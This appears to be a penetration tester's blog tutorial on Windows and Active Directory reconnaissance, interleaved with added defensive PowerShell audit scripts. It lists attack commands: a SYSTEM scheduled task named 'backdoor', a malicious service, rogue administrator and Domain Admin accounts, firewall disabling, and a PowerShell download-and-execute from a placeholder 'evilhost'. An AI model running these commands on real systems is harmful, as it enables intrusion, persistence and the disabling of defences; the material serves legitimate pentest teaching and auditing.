During a pentest, gathering information about the target systems is essential. Here are a few commands that I personally use frequently when gathering information about Microsoft environments:
Note: you can get more information about the commands used in this article by typing help commandname
or commandname /?
Information Gathering About Local System
For detecting network adapters, IP addresses and the DNS server:
C:\Users\Hyaloid>ipconfig /all
--code snippet--
IPv4 Address. . . . . . . . . . . : 10.0.0.43
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.0.10.100
DNS Servers . . . . . . . . . . . : 10.0.0.1
--code snippet--
Gathering information about open ports (this also shows services that only listen on the local host):
C:\Users\Hyaloid>netstat -anot
Proto Local Address Foreign Address State PID Offload State
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 536 InHost
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 InHost
TCP 0.0.0.0:902 0.0.0.0:0 LISTENING 3800 InHost
TCP 0.0.0.0:912 0.0.0.0:0 LISTENING 3800 InHost
TCP 0.0.0.0:1536 0.0.0.0:0 LISTENING 680 InHost
TCP 0.0.0.0:1537 0.0.0.0:0 LISTENING 1272 InHost
TCP 0.0.0.0:1538 0.0.0.0:0 LISTENING 1784 InHost
TCP 0.0.0.0:1539 0.0.0.0:0 LISTENING 760 InHost
TCP 0.0.0.0:1540 0.0.0.0:0 LISTENING 3216 InHost
--code snippet--
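The netstat -anot output above only gives a PID per socket. The following PowerShell script, an added example that is not part of the original post, joins each listening TCP socket to its process and separates sockets bound to all interfaces (reachable from the network) from those bound to a specific address such as loopback. It assumes Windows 8 / Server 2012 or later (NetTCPIP module); run it elevated so every process path is visible.

```powershell
# Added example (not the post's own code): map every listening TCP socket to its
# owning process and classify it as reachable from the network (bound to 0.0.0.0
# or ::) or bound to a specific address such as 127.0.0.1. Assumes Windows 8 /
# Server 2012 or later (Get-NetTCPConnection); run elevated to see every path.

function Get-ListeningPortInventory {
    # Build a PID -> Process lookup once instead of calling Get-Process per socket
    $procs = @{}
    Get-Process | ForEach-Object { $procs[$_.Id] = $_ }

    Get-NetTCPConnection -State Listen | ForEach-Object {
        # OwningProcess is UInt32; cast so the key matches Process.Id (Int32)
        $p = $procs[[int]$_.OwningProcess]
        $allInterfaces = $_.LocalAddress -in @('0.0.0.0', '::')
        [pscustomobject]@{
            Port     = $_.LocalPort
            Address  = $_.LocalAddress
            Exposure = if ($allInterfaces) { 'all-interfaces' } else { 'specific-address' }
            PID      = $_.OwningProcess
            Process  = if ($p) { $p.ProcessName } else { '(exited or unknown)' }
            # Path is $null for protected processes such as System (PID 4)
            Path     = if ($p) { $p.Path } else { $null }
        }
    } | Sort-Object Exposure, Port
}

# 'all-interfaces' sorts first: those listeners are the host's remote attack surface
Get-ListeningPortInventory | Format-Table -AutoSize
```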
Gathering information about running tasks and killing tasks (if you have sufficient privileges):
C:\Users\Hyaloid>tasklist
--Shows All Tasks running--
--Code Snippet--
C:\Users\Hyaloid>tasklist /FI "PID eq 4372" --Finding the process whose PID is 4372--
Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
TeamViewer_Service.exe 4372 Services 0 17.568 K
C:\WINDOWS\system32>tasklist /FI "USERNAME eq NT AUTHORITY\SYSTEM" /FI "STATUS eq running" --Finding running processes that run as NT AUTHORITY\SYSTEM--
Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
csrss.exe 688 Console 1 13.456 K
NVDisplay.Container.exe 1876 Console 1 23.504 K
C:\WINDOWS\system32>taskkill /F /FI "PID eq 4372" --Killing the process whose PID is 4372--
SUCCESS: The process with PID 4372 has been terminated.
Gathering information about the system (OS name, version, type, installed hotfixes, etc.):
C:\Users\Hyaloid>systeminfo
--code snippet--
OS Name: Microsoft Windows 10 Education
OS Version: 10.0.15063 N/A Build 15063
--code snippet--
System Type: x64-based PC
--code snippet--
Hotfix(s): 4 Hotfix(s) Installed.
[01]: KB4022405
[02]: KB4025376
[03]: KB4038806
[04]: KB4040724
--code snippet--
Listing scheduled tasks and creating scheduled tasks (you must be an administrator):
C:\WINDOWS\system32>schtasks
--code snippet--
Folder: \
TaskName Next Run Time Status
======================================== ====================== ===============
Adobe Acrobat Update Task 10.07.2018 01:00:00 Ready
Adobe Flash Player NPAPI Notifier 14.07.2018 03:01:00 Ready
--code snippet--
Folder: \Microsoft\Windows\ApplicationData
TaskName Next Run Time Status
======================================== ====================== ===============
appuriverifierdaily 10.07.2018 03:00:00 Ready
appuriverifierinstall 14.07.2018 03:00:00 Ready
CleanupTemporaryState N/A Ready
DsSvcCleanup N/A Ready
--code snippet--
C:\WINDOWS\system32>schtasks /create /ru SYSTEM /sc MINUTE /MO 5 /tn backdoor /tr "\"C:\\Users\\Hyaloid\\backdoor.exe\""
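From the defender's side, the schtasks /create line above leaves a recognisable footprint: a task running as SYSTEM whose action points into a user profile and which repeats every few minutes. The following PowerShell audit, an added example that is not part of the original post, lists SYSTEM tasks showing either trait. It assumes Windows 8 / Server 2012 or later (ScheduledTasks module); the path patterns and the 15-minute threshold are assumptions to tune per environment.

```powershell
# Added example (not the post's own code): flag scheduled tasks that run as
# LocalSystem and either execute something from a user/temp path or repeat on a
# short interval. Assumes the ScheduledTasks module (Windows 8+/Server 2012+);
# the path pattern and the 15-minute threshold below are assumptions.

$SuspiciousPathPattern = '(?i)\\Users\\|\\Temp\\|\\AppData\\|%TEMP%|%APPDATA%|%USERPROFILE%'

function Get-IntervalMinutes([string]$Iso8601Duration) {
    # Repetition.Interval is an ISO 8601 duration such as PT5M or PT1H30M
    if (-not $Iso8601Duration) { return $null }
    $m = [regex]::Match($Iso8601Duration, '^P(?:(\d+)D)?T?(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?$')
    if (-not $m.Success) { return $null }
    # Groups that did not participate are '' and are treated as 0
    $d, $h, $min, $s = 1..4 | ForEach-Object { [int]($m.Groups[$_].Value -replace '^$', '0') }
    return $d * 1440 + $h * 60 + $min + [math]::Ceiling($s / 60)
}

function Find-SuspiciousSystemTasks {
    Get-ScheduledTask |
    Where-Object { $_.Principal.UserId -match '(?i)^((NT AUTHORITY\\)?SYSTEM|S-1-5-18)$' } |
    ForEach-Object {
        $task = $_
        $flags = @()
        foreach ($a in $task.Actions) {
            # Non-exec actions (COM handlers) have no Execute property and never match
            $cmd = "$($a.Execute) $($a.Arguments)"
            if ($cmd -match $SuspiciousPathPattern) { $flags += "action in user/temp path: $cmd" }
        }
        foreach ($t in $task.Triggers) {
            $mins = Get-IntervalMinutes $t.Repetition.Interval
            if ($null -ne $mins -and $mins -le 15) { $flags += "repeats every $mins min" }
        }
        if ($flags.Count -gt 0) {
            [pscustomobject]@{
                TaskPath = $task.TaskPath
                TaskName = $task.TaskName
                State    = $task.State
                Reasons  = ($flags -join '; ')
            }
        }
    }
}

Find-SuspiciousSystemTasks | Format-Table -AutoSize
```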
Finding, adding and deleting users and groups, and gathering information about a specific user or group:
C:\WINDOWS\system32>net users
--code snippet--
-------------------------------------------------------------------------------
Administrator Guest Hyaloid
DefaultUser
C:\WINDOWS\system32>net localgroup
--code snippet--
*__vmware__
*Administrators
*Backup Operators
*Cryptographic Operators
*Distributed COM Users
--code snippet--
C:\WINDOWS\system32>net users pentest Password1 /add
Command completed successfully.
C:\WINDOWS\system32>net localgroup "Administrators" pentest /add
Command completed successfully.
C:\WINDOWS\system32>net users pentest /del
Command completed successfully.
C:\WINDOWS\system32>net users pentest Password1 /add /DOMAIN (adds the user to the domain)
Command completed successfully.
C:\WINDOWS\system32>net group "Domain Admins" pentest /DOMAIN /add (can only be run by a Domain Admin)
Command completed successfully.
C:\WINDOWS\system32>net users hyaloid
--code snippet--
Local Group Memberships *Administrators
*Performance Log Users
Global Group memberships *None
--code snippet--
Gathering information about services:
C:\>sc query
--code snippet--
SERVICE_NAME: SQLWriter
DISPLAY_NAME: SQL Server VSS Writer
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: SSDPSRV
DISPLAY_NAME: SSDP Bulma
TYPE : 30 WIN32
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
--code snippet--
C:\>sc query state= inactive //stopped services
--code snippet--
Starting, stopping, deleting and editing services:
C:\>sc create "Evil Service" binPath= "C:\Hyaloid\evil.exe" start= auto
C:\>sc start "Evil Service" //start
C:\>sc stop "Evil Service" //stop
C:\>sc config "Evil Service" binPath= "C:\Users\Hacker\Desktop\evil.exe" start= demand //edit (start= demand means manual start; "manual" is not an accepted value)
C:\>sc delete "Evil Service" //delete
Checking file permissions:
C:\>icacls "C:\Users\Hyaloid\AppData\Local\Temp"
C:\Users\Hyaloid\AppData\Local\Temp Everyone:(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(OI)(CI)(F)
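The icacls output above (Everyone with (F) on a directory) and the sc create / sc config binPath= commands before it describe the two halves of one classic local-privilege issue: a service that runs as LocalSystem from a location low-privileged users can write to. The following PowerShell audit, an added example that is not part of the original post, walks every installed service and reports those whose binary or containing directory grants write-class rights to such principals. It assumes an elevated prompt, and the principal list is an assumption to adapt per environment.

```powershell
# Added example (not the post's own code): find services whose binary, or the
# directory holding it, can be written by low-privileged principals. Assumes an
# elevated prompt so Get-Acl can read every path; the principal list is an
# assumption. Generic-right ACEs (raw numeric values) are not decoded here.

$WeakPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                    'NT AUTHORITY\INTERACTIVE')
# Any of these bits lets a principal replace or re-point the file
$WriteMask = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'

function Get-ServiceBinaryPath([string]$PathName) {
    # PathName is the raw command line, e.g. "C:\Program Files\X\svc.exe" -k net
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    # Unquoted paths containing spaces will not resolve here (a separate finding)
    return ($PathName -split '\s+')[0]
}

function Test-WeakWriteAcl([string]$Path) {
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -eq 'Allow' -and
            $WeakPrincipals -contains $ace.IdentityReference.Value -and
            (($ace.FileSystemRights -band $WriteMask) -ne 0)) { return $true }
    }
    return $false
}

function Find-WritableServiceBinaries {
    Get-CimInstance Win32_Service | ForEach-Object {
        $exe = Get-ServiceBinaryPath $_.PathName
        if (-not $exe -or -not (Test-Path -LiteralPath $exe)) { return }
        $exeWeak = Test-WeakWriteAcl $exe
        $dirWeak = Test-WeakWriteAcl (Split-Path -Parent $exe)
        if ($exeWeak -or $dirWeak) {
            [pscustomobject]@{
                Service   = $_.Name
                RunsAs    = $_.StartName
                StartMode = $_.StartMode
                Binary    = $exe
                Weakness  = if ($exeWeak) { 'binary writable' } else { 'directory writable' }
            }
        }
    }
}

Find-WritableServiceBinaries | Format-Table -AutoSize
```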
Playing with firewall configurations:
PS C:\WINDOWS\system32> netsh advfirewall show currentprofile
Private Profile Settings:
----------------------------------------------------------------------
State ON
Firewall Policy BlockInbound,AllowOutbound
LocalFirewallRules N/A (GPO-store only)
LocalConSecRules N/A (GPO-store only)
InboundUserNotification Enable
--code snippet--
PS C:\WINDOWS\system32> netsh advfirewall set currentprofile state off //You can change profile to domainprofile.
Ok.
Downloading files to the target system via PowerShell:
C:\>powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.103/evil.exe','C:\Users\Hyaloid\Downloads\evil.exe')
Downloading and executing .ps1 files via PowerShell (you can use this to execute PowerShell scripts on the target):
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://evilhost/Malicious.ps1')"
Microsoft Domain Structure Enumeration
In order to gather information about domain structures, I personally use an excellent and simple tool called windapsearch. It uses LDAP queries to extract information about users, groups and computers.
Here is an example taken from its README file:
root@kali:~/windapsearch# ./windapsearch.py -d lab.ropnop.com -u ropnop\\ldapbind -p GoCubs16 --da
[+] No DC IP provided. Will try to discover via DNS lookup.
[+] Using Domain Controller at: 172.16.13.10
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=lab,DC=ropnop,DC=com
[+] Attempting bind
[+] ...success! Binded as:
[+] u:ROPNOP\ldapbind
[+] Attempting to enumerate all Domain Admins
[+] Using DN: CN=Domain Admins,CN=Users.CN=Domain Admins,CN=Users,DC=lab,DC=ropnop,DC=com
[+] Found 12 Domain Admins:
cn: Administrator
cn: Andy Green
userPrincipalName: agreen@lab.ropnop.com
cn: Natasha Strong
userPrincipalName: nstrong@lab.ropnop.com
cn: Linda Alton
userPrincipalName: lalton@lab.ropnop.com
There are also a few Metasploit modules that you can use to gather information about the domain:
post/windows/gather/enum_domain
post/windows/gather/enum_domain_group_users
post/windows/gather/enum_domain_users
post/windows/gather/enum_domains
post/windows/gather/enum_ad_computers
Of course, these techniques are not all of the techniques that pentesters may use to gather information, but I can say for sure that I use these ones.